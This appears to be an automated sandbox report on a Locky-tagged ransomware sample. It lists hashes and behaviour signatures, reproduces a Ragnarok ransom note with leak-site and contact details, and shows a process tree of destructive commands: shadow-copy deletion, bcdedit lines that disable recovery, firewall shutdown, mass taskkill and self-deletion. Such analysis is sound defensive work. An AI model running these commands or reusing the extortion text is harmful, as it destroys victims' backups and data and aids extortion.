Overview

overview

10

Static

static

3

b5466ce462...JC.exe

windows7-x64

10

b5466ce462...JC.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    18-09-2023 18:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe

  • Size

    169KB

  • MD5

    98562209465bec53327e65649a2b8829

  • SHA1

    3a47656ed3df213bd934aa01078a863568fe9f2b

  • SHA256

    b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe

  • SHA512

    c11ce14f9cb75df2bc9bd81971c1f8fa885815715f389eb8e796e0f657de59756b36a6f896c216a03c7be7bb3ddff9b8a47aee71146760e4f4d9c6bdc0ff2cc3

  • SSDEEP

    3072:iFgiMd04bHHr/QFDtaruNyXgs7WL61fXbEiVkYELY2P+gA/PF:UE3bHL/ngsu61kYELNmhF

Score
10/10
lockyevasionransomware

Malware Config

Extracted

Path

C:\Users\Admin\Documents\!!Read_Me.56322.html

Ransom Note
<!DOCTYPE html><h1>#ALL YOUR FILES ARE ENCRYPTED AND STOLEN BY RAGNAROK</h1>Dear Sir<br><br>Your files are encrypted with RSA4096 and AES encryption algorithm. <br>But don't worry, you can return all your files!! follow the instructions to recover your files <br><br>Cooperate with us and get the decrypter program as soon as possible will be your best solution.<br>Only our software can decrypt all your encrypted files.<br><br>What guarantees you have?<br>We take our reputation seriously. We reject any form of deception</br>You can send one of your encrypted file from your PC and we decrypt it for free. <br>But we can decrypt only 1 file for free. File must not contain any valuable information.<br>When hiring third-party negotiators or recovery companies. listen to what they tell you. try to think.<br> Are they really interested in solving your problems or are they just thinking about their profit and ambitions?<br><br>By the way.We have stolen lots of your company and your private data which includes doc,xls,pdf,jpg,mdf,sql,pst...<br>Here we upload sample files of your company and your private data on our blog :<br>http://wobpitin77vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion<br>We promise that if you don't pay within a week, we will package and publish all of your company and your data on our website.<br>We also promise we can decrypt all of your data and delete all your files on internet after your payment.<br>Such leaks of information lead to losses for the company. fines and lawsuits. And don't forget that information can fall into the hands of competitors!<br>For us this is just business and to prove to you our seriousness.<br><br>Our e-mail:<br> [email protected]<br><br> Reserve e-mail:<br>[email protected]<br>[email protected]<br><br>Device ID:<br> AAwX5EjLw4yNyEjLwEDLCdVSIF1SXpFLyMjMxQEN3ATQBljQyUjR4EERzUEN0gDMDNER3UTQFFzM4QUQEF0M5EDOwEkM2QTMFlDOwgzM0czNxgTREVjMwIDMDhjNBNURxUTRxYTNGREOFZjQGBTOxkTQFdTMwYDRBVkR5UDMykDN4QjNzIjMFFTNGVkQBNTR1kzN0IDNEF0QygDM5EUODRTM3EkR1QDOwUTR2MzQyUzN3UjRFZERyIkN3kjNyATQFdzN0MURyQzN0UUQ0QkQ5ATNzkjN1UkNBNUOyQDN2EjNzYjQxYjQwQERyIkRwMUN1UUNDdDN2UDNFRTO2QDNwQUN1I0Q1UUOCBTM5gTQwQjM5kDM3YzMzYzNyEzMFdDMBBDO3gzNBJDMBVTQ1YTNDJURycDOFhjR1EDOyIzMDhTMDBTRyYzNFhzM0kDNxQTO2YkQ1QjRDdDOGNTQ4U0NzUzNxMUOGhzQCF0M5ATNBBDO5kjM0QzMGhTMxEjRFhjQFhTRzgDN0MEN1IENBFDO2MTO1gDN5YEODRUOBJUMCJTNDBTOFNDRwQjNBZDO2Q0QwIUO1QzQyAzMENUO3UDOEBTOBZTN3EDRDdTRCV0MEdTR5YjM0IUNEdDRFJkMzQDOBZkQ2YDN2IzN0UkRENjQzUDOwIEOwcTM5ADMwETOwMjQBdjRCVjNGFEM3M0Q4YEM4YERyY0MwEjQDZjRyU0MGNERCZERyIERxUUQyATM3ETNEREN0UDMGNkM5cTQFdjM3M0QxIkQEZjN2YTRyITN2E0QBZ0MwATO0EDMwATM4MzN2IEOxYEREhTR0ETMyYEO1cjQFVzNxQTREVTMxIkRClzNFJTOGdDR0gDM5gTNFBzNGFTQGRkN4MDRxQjRGdTQDZDM3UkM5Y0QFdzQyI0QykjQEdDRCNDR0IkMGVEOxkjNENzNwYUOFlzMwgjM0QzQzUDMGVTRyY0QwETOGZkR5M0Q4EzNyQ0QwQUQzUTM0YDOCVjREdjQyADMGdzQ0ATO2M0M3UkM4UEOxIUO0UUMzQUNGRUR1ADREdDOyUTMxcjN0gTMFVERxM0N1YzNDhzN4QUQCZzNwM0NyYER4gDM2UENGZ0Q4EjMwQDN1MEOwQERzQURFJENCRER3gTRzQkNCNDR2MUN3YjN3ETRFJUM3MDO3czNzIjMwQzNBhzMyMDNGFzMDZUQGZUQFRkRyIjN4ETN5MEOEhjR1YDO0IDN0MTMyUjQxgDRwUTQ3gTMElTOyATOyMTQ5YTOEFkNBRjQCR0MGVUO3QEO0UDMEFEN3IEOwgDN3QjQxMTNygzQ3cTNDZDM2IkRzUDN2EENwMERCBDREZ0QDhzQyUENwMkQEBjN4MDOyY0N1IUR2IkN2YjN4ITQ2EjN5wCOBNTNBR0QBZUOyMEOGlzNBNkN3IzQBF0MzAjRwYERGJEOBVUMGVkQyYkNBVER0MTQwgzN4MUMGRUQBVzMDVTM0YjM2QkQ1gjQ1MTN3gTRFJzN4MER3UTOxMTN4UkM0QTOEZUMGVDM3gzM2E0NwMDNERUO3kjMFVkQwEURCdTOyETRCBDNwY0N3gjQ0QUN5EjMEJTQERUNFhDM1EDMCZTMwATOGZTOBljN4IUNFBjM5MERElDMBZTNBJDRGljQ4czQwMEN2UjQ0YjN0cTOBVkR4E0N2UUR1QURyYkQxIzNBlTQ3MUQ2YkR2kzNERkQ3MTQwIUOENURFVjM4QTMxEUN5EkRwITQxkDRFRTOGJjN2IER2kjRCVUMxUURxEkN3MUOCdTQChDOFNDM2EzMwEDRDdDN5MUODJjM3QDO5QTQ4UUN5cTRxAjQyITQxAjRCFUMEZjNEJkNxEzQwczM3kTN4kTO1MDO1kzQ3IEMxUjRygjN2YTMwcTRzYERxYDMzEENzYkRFREREFzM2YDNChTRBFkQ2QUO3UTMwMEREREOykjQ5YEMyYzNzETQzM0Q5UjNBhzQCJjREVEO1MkNzIUM5UDN5EURDRUNFNzMDdTQ2czQ3YUOFVzQ2gzQDJkNEBTN5Q0N3QzM3IUMCZkQGFDO3cjM1EUN2MDN4AjRyYkRGFjMERUOFJjR0EjMxcTNwY0QxYUM0gTRBJkQxcjRFV0NEZUQGJjQ1EkR0kzMERTRDVzMFV0M0EUOCR0QxMENyQkMCdTN3MzMDBzMDRkRyUDRxU0M5QjN2YjRyMjN3EjRCZUOzcjNGRkRyYTQGZTMDRUOFFDN5ETQGRkN3cDNDFTR4czQFZTOwQDOENkR4kjRyUUQ3MzMERDNEFDMBZTMFBDM2MkNBdjN4MjMCVUN5UDMzgTRCRkQERTRwM0N1ADR1kTOGNDR3kTMDJTOwUDRwUDOEREMyAjNCNjRBZUNDNjRyYTQDFUMzMDOwIjR3EjRCdTQ5cjM3gTMBFjN3UEMzIERCV0Q2IjRwEDOzQEODZDRBJTM0EjNBVjRxgTQxYDN3QEO3MjQyEUOBN0M3UzQzMjR4E0QEVUNyMkQDRTMwkjQzYUQBJTR3UjMxYzNyczNDNDOCNzN0ETN1kDO5cjMGBjM3czQ1YjQCNkRxkjR3ADNCZUOGJkQDJkMBZTNBVERGNUOBVjR1UDREJjQ2IkM0AjR3MDM4MTN0gTRwYDN0UUO4QDN3YTQGlDMyM0MBhzNyMUOGJjR4ADR1UDNChzQ4UTO3YTNwIEMwUjNwUDRFZUO4UDRFFUM3IzQ0YjN3UDMCNkMGFzN2cDMzQjRFFERBJ0M1kjQCVDN2M0QFJzQBBzM
Emails

[email protected]<br><br>

e-mail:<br>[email protected]<br>[email protected]<br><br>Device

Signatures

  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

    ransomwarelocky
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (149) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Deletes itself 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 13 IoCs
    evasion
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 56 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\system32\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2688
    • C:\Windows\system32\cmd.exe
      cmd.exe /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
    • C:\Windows\system32\cmd.exe
      cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2644
    • C:\Windows\system32\cmd.exe
      cmd.exe /c bcdedit /set {current} recoveryenabled no
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2824
    • C:\Windows\system32\cmd.exe
      cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:3056
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im note*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im note*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im powerpnt*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1888
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im powerpnt*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im winword*
      2⤵
        PID:1348
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im winword*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2500
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im excel*
        2⤵
          PID:2164
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im excel*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1992
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im Exchange*
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1884
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im Exchange*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2828
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im sql*
          2⤵
            PID:212
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im sql*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1652
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im mys*
            2⤵
              PID:1972
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im mys*
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1960
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im post*
              2⤵
                PID:2012
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im post*
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1312
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im vee*
                2⤵
                  PID:1032
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im vee*
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2704
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im python*
                  2⤵
                    PID:800
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im python*
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1980
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im java*
                    2⤵
                      PID:2008
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im java*
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2116
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im apache*
                      2⤵
                        PID:748
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im apache*
                          3⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1284
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im tomcat*
                        2⤵
                          PID:1588
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im tomcat*
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1432
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe
                          2⤵
                          • Deletes itself
                          PID:2744
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1
                            3⤵
                            • Runs ping.exe
                            PID:1616
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2700

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\Documents\!!Read_Me.56322.html
                        Filesize

                        4KB

                        MD5

                        c0db3a023290d1204a6a8a26bb9360da

                        SHA1

                        f8ff6d2e8dda81e854128ec41148f372c5c514d3

                        SHA256

                        1f48dad202a89e13a5325e608c7daaa6910982184f334b69f2500724f1a17771

                        SHA512

                        caa8eddab5c7037ccbe474fb939c681e6a5a3b638e6a5d7129ea4d5dd0780a083ee78210f4b000195109ce1f9a38bdc7cace5475919e6260561c1242ba2faba0

                        Download Submit

                      • memory/1768-0-0x0000000010000000-0x000000001001C000-memory.dmp

                        Filesize

                        112KB

                        Download